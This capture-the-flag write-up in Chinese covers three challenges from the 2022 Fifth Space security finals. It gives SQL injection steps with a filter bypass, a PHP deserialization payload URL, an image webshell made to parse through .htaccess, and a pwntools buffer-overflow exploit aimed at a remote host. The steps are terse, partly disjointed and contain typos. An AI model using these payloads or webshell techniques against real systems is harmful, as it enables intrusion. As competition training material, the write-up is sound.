本文来自:天权信安网络安全生态圈
作者:天权Megrez
01
Easysqli:
找到传参点id
转码后可以注入
试了试盲注,发现数据库大小是4
尝试联合注入,回显点是2
尝试直接information_schema打,发现information_schema被过滤
看了下版本和root权限,想到用其他数据库代替information_schema
无列名注入一发打过去,发现出东西了
但是不知道flag有几列,索性直接猜了下,没想到直接出文件了
尝试load_file出,但是没结果
发现无论输入什么用户名密码,所有返回包长度一样
直接改useragent为宇宙电脑
再改accept为application/flag,提示错误的用户名密码
直接爆表登录
2022 / 9 / 26
02
ezupload
经过测试找到一段反序列化的
构造pop链
class Gethint{
protected $value=1;
public function __destruct(){
}
}
$c=new Gethint;
echo urlencode(serialize($c));
?>
双写绕过
http://39.107.78.119:64531/?source=1&hh=O%3A7%3A%22GeGethintthint%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00value%22%3Bi%3A1%3B%7D
得到提示一个上传点
测试上传,可以上传图片马 但是解析不了
构造.hatccess文件添加解析
蚁剑连接
2022 / 9 / 23
03
takeeasy
exp:
from pwn import *
p = remote('39.107.243.76',58623)
pay = b'a'*(0x18)+p64(0x40118A)
p.sendline(pay)
p.interactive()
2022 / 9 / 26
微信公众号 / 天权信安
原文始发于微信公众号(天权信安):2022第五空间网络安全决赛WriteUp
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论